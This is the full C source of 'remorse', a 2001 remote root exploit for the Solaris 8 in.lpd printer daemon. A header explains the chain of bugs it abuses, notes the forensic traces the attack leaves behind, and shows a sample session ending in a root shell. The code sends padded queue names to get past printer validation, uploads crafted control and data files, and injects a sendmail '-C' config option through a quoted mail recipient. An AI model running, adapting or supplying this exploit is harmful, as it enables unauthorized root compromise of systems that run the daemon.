/*
 * remorse 
 * Solaris 8 in.lpd remote root exploit 
 * by ron1n <shellcode@hotmail.com>
 * July 2001
 *
 * This is not the ISS hole -- that one doesn't seem to be exploitable on the
 * SPARC architecture. I spent a week studying all of the lp binary and library
 * code trying to find a nice overflow that would be exploitable on SPARC. This
 * is the best I could come up with though. I'm disappointed because it's very
 * similar to the old SNI/NAI BSD lpd vuln and the l0pht/@stake Linux lpd vuln.
 *
 * There are no printer conditions that have to be met. If the system happens
 * to be running in.lpd, consider it owned. It can be a noisy attack; other
 * than possible syslog locations, evidence will exist under /var/spool/lp/tmp,
 * /var/spool/lp/requests, and the mail spool directory (/tmp).
 *
 * The exploit targets four programs: in.lpd, lpsched adaptor, /bin/mail, and
 * sendmail. Obviously there are going to be differences among Solaris releases
 * and individual configurations. For instance, the Solaris 7 version of in.lpd
 * doesn't have IPv6 support like the Solaris 8 version does, so if your IP
 * address doesn't reverse-resolve, in.lpd will create a different directory
 * on each release. I've handled this now in case I do a rewrite, but Solaris 7
 * has other issues that need to be investigated. Solaris 2.6 looks even worse.
 * If someone hooks me up with source code, I'll try to add 7 and 2.6 support.
 *
 * If you're not getting results, try playing around with some command line
 * switches or some files in the exploit tarball, particularly 'script'. The
 * system's responses, or lack thereof, can tell you everything you need for 
 * a successful exploitation. 
 *
 * Now you too can sleep well at night knowing that there are still ways to 
 * compromise a Solaris box remotely without relying on Sun's rpc nightmare.
 *
 * "Something about you is very wrong..."
 */

/*
bash-2.04$ telnet xxx.xxx.xx.xx 37777
Trying xxx.xx.xx.xxx...
telnet: connect to address xxx.xx.xx.xxx: Connection refused
telnet: Unable to connect to remote host
bash-2.04$ ./remorse -6 yyy.yyy.yy.yy xxx.xxx.xx.xx
..............Done
bash-2.04$ sleep 10; telnet xxx.xxx.xx.xx 37777
Trying xxx.xx.xx.xxx...
Connected to xxx.xxx.xx.xx.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
sh: ^M: not found    	
uname -srm;
SunOS 5.8 sun4m
sh: ^M: not found
^]
telnet> q
Connection closed.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "remorse.h"
#include "prerr.h"


int
main(int argc, char **argv)
{
    int ch, sd[2], flags = 0;
    char *prog = argv[0];
    char *dir, *source, *target;
    int slashes = SLSHNUM;
    unsigned short port = LPDPORT;
    struct sockaddr_in caddr, saddr;

    extern char *optarg;
    extern int optind, opterr;
    opterr = 0;

    while((ch = getopt(argc, argv, "6d:s:p:")) != -1) {
        switch(ch) {
            case '6': flags |= LPDIPV6;
                      break;
            case 'd': flags |= LPDSDIR; dir = optarg;
                      break;
            case 's': slashes = (int) strtol(optarg, NULL, 0);
                      break;
            case 'p': port = (unsigned short) strtoul(optarg, NULL, 0);
                      break;
            default : usage(prog);
        }
    }

    argc -= optind;
    argv += optind;

    if(argc != 2) {
        usage(prog);
    } else {
        source = argv[0];
        target = argv[1];
    }

    memset(&caddr, 0, sizeof caddr);
    caddr.sin_family = AF_INET;
    caddr.sin_addr = resolve_host(source);

    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(port);
    saddr.sin_addr = resolve_host(target);

    if(!(flags & LPDSDIR)) {
        dir = source_shoveit(inet_ntoa(caddr.sin_addr), flags & LPDIPV6);
    }

    make_mail(CONFIG, MAILTMP, dir);
    make_ctrl(CONTROL, dir);

    if((sd[0] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        pr_exit(1, "socket()");
    }

    if((sd[1] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        pr_exit(1, "socket()");
    }

    if(bind(sd[0], (struct sockaddr *) &caddr, sizeof caddr) < 0) {
        pr_exit(1, "bind()");
    }

    if(bind(sd[1], (struct sockaddr *) &caddr, sizeof caddr) < 0) {
        pr_exit(1, "bind()");
    }

    if(connect(sd[0], (struct sockaddr *) &saddr, sizeof saddr) < 0) {
        pr_exit(1, "connect()");
    }

    if(connect(sd[1], (struct sockaddr *) &saddr, sizeof saddr) < 0) {
        pr_exit(1, "connect()");
    }

    lpd_einleitung(sd[0], slashes);
    lpd_xfer_file(sd[0], TYPE_CTRL, CONTROL, "cfA666owned");
    lpd_xfer_file(sd[0], TYPE_DATA, CONFIG, "mail.cf");
    lpd_xfer_file(sd[0], TYPE_DATA, SCRIPT, "script");
    /* Force an exception so the data files are kept */
    lpd_send_data(sd[0], "\2!\n", 3, 1);
    close(sd[0]);

    lpd_einleitung(sd[1], slashes);
    lpd_xfer_file(sd[1], TYPE_CTRL, CONTROL, "cfA666owned");
    /* Doesn't matter... */
    lpd_xfer_file(sd[1], TYPE_DATA, CONFIG, "dfA666config");
    lpd_xfer_file(sd[1], TYPE_DATA, SCRIPT, "dfA666script");
    close(sd[1]);

    puts("Done");
    exit(0);
}

void
make_mail(char *name, char *tmpl, char *dir)
{
    int ch1, ch2;
    FILE *fpin, *fpout;

    if(!(fpin = fopen(tmpl, "r"))) {
        pr_exit(1, "fopen(%s)", tmpl);
    }

    if(!(fpout = fopen(name, "w"))) {
        pr_exit(1, "fopen(%s)", name);
    }

    while((ch1 = getc(fpin)) != EOF) {
        if(ch1 == '%') {
            if((ch2 = getc(fpin)) == 's') {
                fputs(dir, fpout);
                continue;
            } else {
                ungetc(ch2, fpin);
            }
        }
        putc(ch1, fpout);
    }

    if(ferror(fpin)) {
        pr_exit(1, "getc(%s)", tmpl);
    }

    fclose(fpin);
    fclose(fpout);
}

void
make_ctrl(char *name, char *dir)
{
    FILE *fpout;

    if(!(fpout = fopen(name, "w"))) {
        pr_exit(1, "fopen(%s)", name);
    }
	
    /*
     * Solaris' /bin/mail disallows a hyphen as the first character in a
     * recipient and disallows spaces anywhere in a recipient. Enter the
     * quotes...
     */
    fprintf(fpout, "Howned\n");
    fprintf(fpout, "P\\\"-C/var/spool/lp/tmp/%s/mail.cf\\\" nobody\n", dir);
    fprintf(fpout, "fdfA666config\n");
    fprintf(fpout, "fdfA666script\n");
    fclose(fpout);
}

void
lpd_send_data(int sd, void *ptr, size_t len, int num)
{
    while(num--) {
        send(sd, ptr, len, 0);
    }
}

void
lpd_send_ack(int sd)
{
    lpd_send_data(sd, "\0", 1, 1);
}

void
lpd_recv_reply(int sd)
{
    int n, ack = 0;
    static char buff[256];

    while((n = recv(sd, buff, sizeof buff - 1, 0)) > 0) {
        if(buff[0] == '\0') {
            ack = 1;
            break;
        }
        buff[n] = '\0';
        fputs(buff, stdout);
        fflush(stdout);
    }

    if(ack) {
        putchar('.');
        fflush(stdout);
    } else {
        pr_exit(0, "No ACK - aborting");
    }
}

void
lpd_einleitung(int sd, int slashes)
{
    /*
     * The slashes are used to fool the access() checks in the lpsched printer
     * validation code, which will then force it to dlopen the lpsched adaptor
     * containing the vulnerability. Thus, we don't need to know a printer
     * name and exploitation succeeds regardless of printer availability.
     *
     * The name that's appended will not be seen by the printer validation code
     * if our calculations are correct. The name will, however, be seen by both
     * isprinter() and isclass() at a later point in the code path and needs to
     * refer to a nonexistent file.
     */
    lpd_send_data(sd, "\2", 1, 1);
    lpd_send_data(sd, "/", 1, slashes);
    lpd_send_data(sd, "KARMAPOLICE\n", 12, 1);
    lpd_recv_reply(sd);
}

void
lpd_xfer_file(int sd, char type, char *src, char *dst)
{
    int n, fd;
    struct stat st;
    static char buff[256];

    if(stat(src, &st) < 0) {
        pr_exit(1, "stat(%s)", src);
    }

    if((fd = open(src, O_RDONLY)) < 0) {
        pr_exit(1, "open(%s)", src);
    }

    snprintf(buff, sizeof buff, "%c%lu %s\n", type, (unsigned long) st.st_size, dst);
    lpd_send_data(sd, buff, strlen(buff), 1);
    lpd_recv_reply(sd);

    while((n = read(fd, buff, sizeof buff)) > 0) {
        lpd_send_data(sd, buff, n, 1);
    }

    lpd_send_ack(sd);
    lpd_recv_reply(sd);
    close(fd);
}

char *
source_shoveit(char *host, int isv6)
{
    char *dir;
    struct hostent *hp;
    struct in_addr addr;

    if(inet_aton(host, &addr)) {
        /* Do we have a PTR reply? */
        if(hp = gethostbyaddr((char *) &addr, sizeof addr, AF_INET)) {
            if(!(dir = malloc(strlen(hp->h_name) + 1))) {
                pr_exit(1, "malloc()");
            }
            strcpy(dir, hp->h_name);
        } else {
            if(!(dir = malloc(strlen(host) + 7 + 1))) {
                pr_exit(1, "malloc()");
            }
            /* Abbreviated IPv4-mapped IPv6 address */
            sprintf(dir, "%s%s", isv6 ? "::ffff:" : "", host);
        }
    } else {
        pr_exit(0, "source_shoveit(): invalid host");
    }

    return dir;
}

struct in_addr
resolve_host(char *host)
{
    struct hostent *hp;
    struct in_addr addr;
    extern int h_errno;

    if(!inet_aton(host, &addr)) {
        if(!(hp = gethostbyname(host))) {
            fprintf(stderr, "%s: %s\n", host, hstrerror(h_errno));
            exit(EXIT_FAILURE);
        } else {
            memcpy(&addr, hp->h_addr, sizeof addr);
        }
    }

    return addr;
}

void
usage(char *app)
{
    fprintf(stderr,
    "remorse - Solaris 8 in.lpd remote root exploit\n"
    "by ron1n <shellcode@hotmail.com>\n"
    "usage: %s [-6] [-d dir] [-s num] [-p port] source target\n"
    "\t-6\tin.lpd uses IPv6 resolver code\n"
    "\t-d\tspecify the directory that will be created\n"
    "\t-s\tnumber of slashes needed to fool printer validation\n"
    "\t-p\tport assigned to in.lpd\n"
    "\tsource\tIP address of your sending interface\n"
    "\ttarget\thost running the vulnerable daemon\n",
    app);
    exit(EXIT_FAILURE);
}
